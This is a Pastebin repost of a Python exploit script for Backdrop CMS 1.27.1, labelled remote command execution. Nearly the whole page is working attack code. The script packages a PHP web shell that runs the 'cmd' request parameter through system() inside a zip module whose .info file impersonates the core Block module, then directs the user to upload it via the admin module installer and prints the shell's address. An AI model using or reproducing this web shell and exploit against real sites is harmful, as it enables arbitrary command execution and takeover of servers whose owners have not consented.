Advertisement
FlyFar

Backdrop CMS 1.27.1 - Remote Command Execution (RCE)

May 19th, 2024
721
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.38 KB | Cybersecurity | 0 0
  1. # Exploit Title: Backdrop CMS 1.27.1 - Remote Command Execution (RCE)
  2. # Date: 04/27/2024
  3. # Exploit Author: Ahmet Ümit BAYRAM
  4. # Vendor Homepage: https://backdropcms.org/
  5. # Software Link: https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip
  6. # Version: latest
  7. # Tested on: MacOS
  8.  
  9. import os
  10. import time
  11. import zipfile
  12.  
  13.  
  14.  
  15. def create_files():
  16. info_content = """
  17. type = module
  18. name = Block
  19. description = Controls the visual building blocks a page is constructed
  20. with. Blocks are boxes of content rendered into an area, or region, of a
  21. web page.
  22. package = Layouts
  23. tags[] = Blocks
  24. tags[] = Site Architecture
  25. version = BACKDROP_VERSION
  26. backdrop = 1.x
  27.  
  28. configure = admin/structure/block
  29.  
  30. ; Added by Backdrop CMS packaging script on 2024-03-07
  31. project = backdrop
  32. version = 1.27.1
  33. timestamp = 1709862662
  34. """
  35. shell_info_path = "shell/shell.info"
  36. os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörü
  37. oluşturur
  38. with open(shell_info_path, "w") as file:
  39. file.write(info_content)
  40.  
  41. shell_content = """
  42. <html>
  43. <body>
  44. <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
  45. <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
  46. <input type="SUBMIT" value="Execute">
  47. </form>
  48. <pre>
  49. <?php
  50. if(isset($_GET['cmd']))
  51. {
  52. system($_GET['cmd']);
  53. }
  54. ?>
  55. </pre>
  56. </body>
  57. </html>
  58. """
  59. shell_php_path = "shell/shell.php"
  60. with open(shell_php_path, "w") as file:
  61. file.write(shell_content)
  62.  
  63. return shell_info_path, shell_php_path
  64.  
  65. def create_zip(info_path, php_path):
  66. zip_filename = "shell.zip"
  67. with zipfile.ZipFile(zip_filename, 'w') as zipf:
  68. # Dosyaları shell klasörü altında sakla
  69. zipf.write(info_path, arcname='shell/shell.info')
  70. zipf.write(php_path, arcname='shell/shell.php')
  71. return zip_filename
  72.  
  73. def main(url):
  74. print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit")
  75. time.sleep(3)
  76.  
  77. print("Evil module generating...")
  78. time.sleep(2)
  79.  
  80. info_path, php_path = create_files()
  81. zip_filename = create_zip(info_path, php_path)
  82.  
  83. print("Evil module generated!", zip_filename)
  84. time.sleep(2)
  85.  
  86. print("Go to " + url + "/admin/modules/install and upload the " +
  87. zip_filename + " for Manual Installation.")
  88. time.sleep(2)
  89.  
  90. print("Your shell address:", url + "/modules/shell/shell.php")
  91.  
  92. if __name__ == "__main__":
  93. import sys
  94. if len(sys.argv) < 2:
  95. print("Usage: python script.py [url]")
  96. else:
  97. main(sys.argv[1])
  98.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement